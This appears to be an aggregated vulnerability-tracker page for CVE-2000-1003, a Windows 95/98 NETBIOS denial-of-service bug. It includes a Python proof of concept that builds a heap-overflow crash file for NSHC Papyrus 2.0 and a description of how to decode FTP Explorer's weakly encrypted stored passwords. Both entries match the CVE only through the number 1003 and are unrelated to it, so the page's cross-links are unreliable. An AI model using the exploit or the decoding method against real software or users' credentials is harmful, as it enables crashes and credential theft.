CVE-2000-1003
published 2000-12-11CVE-2000-1003: NETBIOS client in Windows 95 and Windows 98 allows a remote attacker to cause a denial of service by changing a file sharing service to return an unknown…
PriorityP413low2.6CVSS 2.0
AVNACHAuNCNINAP
EPSS
12.51%
95.7th percentile
NETBIOS client in Windows 95 and Windows 98 allows a remote attacker to cause a denial of service by changing a file sharing service to return an unknown driver type, which causes the client to crash.
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
NSHC Papyrus 2.0 - Heap Overflow
exploitdb·2011-08-13
NSHC Papyrus 2.0 - Heap Overflow
NSHC Papyrus 2.0 - Heap Overflow
---
#!/usr/bin/python
#
# Title: NSHC Papyrus Heap Overflow Vulnerability
# Date: 13\08\2011
# Author: wh1ant
# Software Link: http://file.atfile.com/ftp/data/03/PapyrusSetup.exe
# Version: 2.0
# Tested On: windows XP SP3 South Korea / windows XP SP3 English VMware Workstation
# CVE: N/A
# Notice:
# Encrypt/Decrypt programs that are created by NSHC
#
fd = open("Attack.txt", "w")
data = 'A'
for i in range(0, 1003):
fd.write(data)
fd.write("BBBB");
fd.write("CCCC");
for i in range(0, 2000):
fd.write(data);
fd.close()
Exploit-DB
FTPx FTP Explorer 1.0.00.10 - Weak Password Encryption
exploitdb·2000-02-25
CVE-2000-0214 FTPx FTP Explorer 1.0.00.10 - Weak Password Encryption
FTPx FTP Explorer 1.0.00.10 - Weak Password Encryption
---
// source: https://www.securityfocus.com/bid/1003/info
FTP Explorer includes the option to store profiles of visited FTP sites. The user's name and password can also be stored. These stored values are kept in the registry, under the key HKCU\Software\FTP Explorer\Profiles\ProfileName\ . The password is encrypted, but the encryption mechanism is weak and can easily be broken.
Each character in the password is incremented by 9, then incremented by (3(n - 1)), n being the characters position in the password. Therefore, a password of AAA (A=41) would be stored as:
[A+9+3(1-1)] [A+9+3(2-1)] [A+9+3(3-1)], or 4A4D50.
*NOTE* This algorithm does not seem to apply for characters outside the range 0x20 - 0x7F. However, it is still possib
No writeups or analysis indexed.
2000-12-11
Published